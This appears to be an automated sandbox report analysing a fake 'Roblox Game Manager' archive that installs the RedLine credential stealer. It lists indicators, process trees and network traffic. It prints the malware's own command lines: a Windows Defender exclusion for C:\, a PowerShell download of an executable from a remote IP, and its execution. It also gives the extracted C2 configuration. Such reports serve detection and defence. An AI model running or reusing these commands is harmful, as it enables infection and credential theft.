File name:

Roblox Game Manager.rar

Full analysis: https://app.any.run/tasks/f73c1b97-2bdc-4533-a995-10993290c2aa
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 25, 2023, 16:10:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
redline
opendir
rat
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

A7A070FEA3E75A91856AE28BA200EB45

SHA1:

18A93136443481CA0EEDE8EC625E21517B504C1B

SHA256:

914349176C58586166FED229065945D849DE72E34CAE9E04585D6186D08F9D34

SSDEEP:

49152:0njnC2HQk9DL6KuEsJKJDoWC1T1o6o1FfBfpu9y3h7lsgmx4srNNVkWyg6tIksvp:cf9DGK8kbkC6o1lu43BmuwBkWQtIkm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Application was dropped or rewritten from another process

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • REDLINE detected by memory dumps

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • Unusual connection from system programs

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3604)
    • REDLINE was detected

      • vbc.exe (PID: 796)
    • Steals credentials from Web Browsers

      • vbc.exe (PID: 796)
    • Connects to the CnC server

      • vbc.exe (PID: 796)
    • Actions looks like stealing of personal data

      • vbc.exe (PID: 796)
  • SUSPICIOUS

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Reads the Internet Settings

      • powershell.exe (PID: 3372)
      • Roblox Game Manager.exe (PID: 2460)
      • powershell.exe (PID: 3792)
      • Roblox Game Manager.exe (PID: 2272)
      • powershell.exe (PID: 1472)
      • powershell.exe (PID: 3604)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3792)
    • Executing commands from a ".bat" file

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Starts CMD.EXE for commands execution

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Download files or web resources using Curl/Wget

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3372)
      • powershell.exe (PID: 1472)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3096)
      • cmd.exe (PID: 2044)
    • Connects to unusual port

      • vbc.exe (PID: 2476)
      • vbc.exe (PID: 796)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 3604)
    • Unusual connection from system programs

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 3604)
    • The process executes VB scripts

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 3604)
    • Connects to the server without a host name

      • powershell.exe (PID: 3604)
    • Searches for installed software

      • vbc.exe (PID: 796)
    • Reads browser cookies

      • vbc.exe (PID: 796)
  • INFO

    • Checks supported languages

      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
      • vbc.exe (PID: 2476)
      • wmpnscfg.exe (PID: 3028)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • The executable file from the user directory is run by the Powershell process

      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
    • Create files in a temporary directory

      • Roblox Game Manager.exe (PID: 2460)
      • Roblox Game Manager.exe (PID: 2272)
    • Reads the computer name

      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2460)
      • wmpnscfg.exe (PID: 3028)
      • vbc.exe (PID: 2476)
      • Roblox Game Manager.exe (PID: 2272)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • The process checks LSA protection

      • Roblox Game Manager.exe (PID: 2460)
      • wmpnscfg.exe (PID: 3028)
      • vbc.exe (PID: 2476)
      • dclppAf.exe (PID: 1628)
      • Roblox Game Manager.exe (PID: 2272)
      • vbc.exe (PID: 796)
      • dclppAf.exe (PID: 752)
    • Reads the machine GUID from the registry

      • vbc.exe (PID: 2476)
      • wmpnscfg.exe (PID: 3028)
      • dclppAf.exe (PID: 1628)
      • dclppAf.exe (PID: 752)
      • vbc.exe (PID: 796)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 3028)
    • Reads Environment values

      • vbc.exe (PID: 796)
    • Reads product name

      • vbc.exe (PID: 796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

RedLine

(PID) Process(2476) vbc.exe
C2 (1)94.142.138.105:15111
Botnetcryptx
Err_msg
Auth_valuea45302b7daf4f87798af144567e5d0ff
US (14)
net.tcp://
/
localhost
a45302b7daf4f87798af144567e5d0ff
Authorization
ns1
CCE9EzoxNB0LHykcOCZRHAoxOVA6MTAcCiEpWw==
HkYmUxQtN1A=
Gulfweed
(PID) Process(796) vbc.exe
C2 (1)94.142.138.105:15111
Botnetcryptx
Err_msg
Auth_valuea45302b7daf4f87798af144567e5d0ff
US (14)
net.tcp://
/
localhost
a45302b7daf4f87798af144567e5d0ff
Authorization
ns1
CCE9EzoxNB0LHykcOCZRHAoxOVA6MTAcCiEpWw==
HkYmUxQtN1A=
Gulfweed
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
18
Malicious processes
12
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs roblox game manager.exe no specs roblox game manager.exe cmd.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs dclppaf.exe no specs #REDLINE vbc.exe wmpnscfg.exe no specs roblox game manager.exe no specs roblox game manager.exe cmd.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs dclppaf.exe no specs #REDLINE vbc.exe

Process information

PID
CMD
Path
Indicators
Parent process
3460"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Roblox Game Manager.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shlwapi.dll
3868"C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb3460.47446\roblox game manager\roblox game manager.exe
c:\windows\system32\ntdll.dll
2460"C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb3460.47446\roblox game manager\roblox game manager.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
3096"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\ED.tmp\FE.tmp\FF.bat "C:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Roblox Game Manager.exe""C:\Windows\System32\cmd.exeRoblox Game Manager.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3372powershell -Command "Add-MpPreference -ExclusionPath "'C:\'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3792powershell -command "wget "http://89.23.96.203/dashboard/1/trashcr.exe" -outfile "C:\Users\admin\AppData\Roaming\dclppAf.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2192powershell -command "Invoke-Expression -Command "C:\Users\admin\AppData\Roaming\dclppAf.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1628"C:\Users\admin\AppData\Roaming\dclppAf.exe"C:\Users\admin\AppData\Roaming\dclppAf.exepowershell.exe
User:
admin
Company:
John Paul Chacha's Lab
Integrity Level:
HIGH
Description:
Setup Package for Chasys Draw IES
Exit code:
0
Version:
5, 25, 1, 0
Modules
Images
c:\users\admin\appdata\roaming\dclppaf.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
2476"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
dclppAf.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual Basic Command Line Compiler
Version:
12.0.51209.34209
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\vbc.exe
c:\windows\system32\mscoree.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
RedLine
(PID) Process(2476) vbc.exe
C2 (1)94.142.138.105:15111
Botnetcryptx
Err_msg
Auth_valuea45302b7daf4f87798af144567e5d0ff
US (14)
net.tcp://
/
localhost
a45302b7daf4f87798af144567e5d0ff
Authorization
ns1
CCE9EzoxNB0LHykcOCZRHAoxOVA6MTAcCiEpWw==
HkYmUxQtN1A=
Gulfweed
3028"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
Total events
12 450
Read events
12 370
Write events
77
Delete events
3

Modification events

(PID) Process:(3460) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3460) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
1
Suspicious files
13
Text files
1 368
Unknown types
0

Dropped files

PID
Process
Filename
Type
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\rumpot\duenessCaleche.xmlxml
MD5:FC7762BCACDBEB75821E3C3D2AC28455
SHA256:742AB78B762E05E053961B85ABFA8618A2895662328D1AE4773B1CB12115FB50
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\benjoinPartile\aboding.xmlxml
MD5:E62A04307D5E1AADE6D6F3F99CB6E2BD
SHA256:06B3B01858339D87039781BCE1324981768E0D617993A3F51B5EA33A4D404CB8
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\ovoidalParers.xmlxml
MD5:81A92A3DF3826262EE836ADC5B3EDBFE
SHA256:7AA2B8FFEEE3FCAC748430FAF88C3B8B801E78F67F76050D72162CD0513955BF
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\inialJomon\limplyMorfond.xmlxml
MD5:EC331637A472239F7D472F13C9E835BD
SHA256:D1FB81152A2909862D1CF6C19E68765E3545096D12E35A47E25BF527A90E9519
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\benjoinPartile\pimpleJicaraJumpily.xmlxml
MD5:053447672F350A4196E75503383BE104
SHA256:9505973060B88E2EF0D6C55132E89C1742187CC6B4B944EC76203137C1C17AB7
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\rumpot\whapukuCorcass.xmlxml
MD5:C17E95105C670AA997577AA6F1629686
SHA256:29A966C56060162872A125D4D43391B33C4D1E15BCC8908011FB6F564DFDB461
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\inialJomon\splurt.xmlxml
MD5:75638DD2021C3C65F87C92022ED2C8C6
SHA256:332C06B8C7DB769EC022DF4B0A5F81891AD438DC0F0B6EE859DF2F7ECA927876
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\bismerAfoot\refines.xmlxml
MD5:5A856C6B9B0AF741F9B6B4FED44C0EC5
SHA256:740C54122F1DE664CAC6DCCFBE4DAC8FEFFFCFC07E9C61600AF29A6A0E6BF5AA
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\pimlicoMustelaAmoraic\whineChilion.xmlxml
MD5:04B15E3AB7CB249FC168B3D2CACD8C63
SHA256:1773DD3F946DBEAC1DE5CA444E2CC8DF14EB17181D9F8FE1DE0F494415A309E6
3460WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb3460.47446\Roblox Game Manager\Data\ached\axinite\bismerAfoot\viraWebbedBossies.xmlxml
MD5:A0F40B5AC4872A26943F67F1132816FD
SHA256:A4887D317901BBA07453C509546E71B9D2BA466B68CB9EA076123ACB982D26BF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
9
DNS requests
0
Threats
39

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3604
powershell.exe
GET
200
89.23.96.203:80
http://89.23.96.203/dashboard/1/trashcr.exe
RU
executable
271 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
3792
powershell.exe
89.23.96.203:80
LLC Smart Ape
RU
suspicious
1076
svchost.exe
224.0.0.252:5355
unknown
3604
powershell.exe
89.23.96.203:80
LLC Smart Ape
RU
suspicious
2400
svchost.exe
239.255.255.250:1900
whitelisted
796
vbc.exe
94.142.138.105:15111
Network Management Ltd
RU
malicious
2476
vbc.exe
94.142.138.105:15111
Network Management Ltd
RU
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
No debug info